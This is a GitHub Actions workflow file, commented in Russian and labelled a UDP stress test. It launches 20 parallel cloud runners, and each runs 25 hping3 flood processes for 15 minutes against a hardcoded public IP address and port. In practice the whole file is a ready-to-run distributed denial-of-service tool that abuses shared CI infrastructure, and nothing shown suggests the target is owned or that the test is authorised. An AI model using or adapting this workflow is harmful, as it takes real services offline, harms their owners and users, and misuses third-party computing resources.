name: Hardcore UDP Stress Test

on:
  workflow_dispatch: # Запуск вручную

jobs:
  flood:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
        machine: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]

    steps:
      - name: Install hping3
        run: sudo apt-get update && sudo apt-get install -y hping3

      - name: Run Extreme UDP Flood
        run: |
          echo "Starting extreme load from machine №${{ matrix.machine }}"
          
          # Настройка системы для максимального выхлопа
          sudo sysctl -w net.ipv4.ip_local_port_range="1024 65535"
          
          # Цель
          TARGET_IP="212.22.85.148"
          TARGET_PORT="8500"
          
          # Запускаем 25 потоков в фоне
          # -d 1350: Размер пакета (почти максимум MTU, чтобы забить Mbps)
          # --flood: Гнать без пауз
          # Мы НЕ используем --rand-source, чтобы трафик точно уходил
          
          for i in {1..25}; do
            sudo hping3 --udp -p $TARGET_PORT -d 1350 --flood $TARGET_IP > /dev/null 2>&1 &
          done

          # Тест будет идти 15 минут (900 секунд)
          echo "Flood is running in 25 threads. Waiting..."
          sleep 900
          
          # Останавливаем всё
          sudo pkill hping3
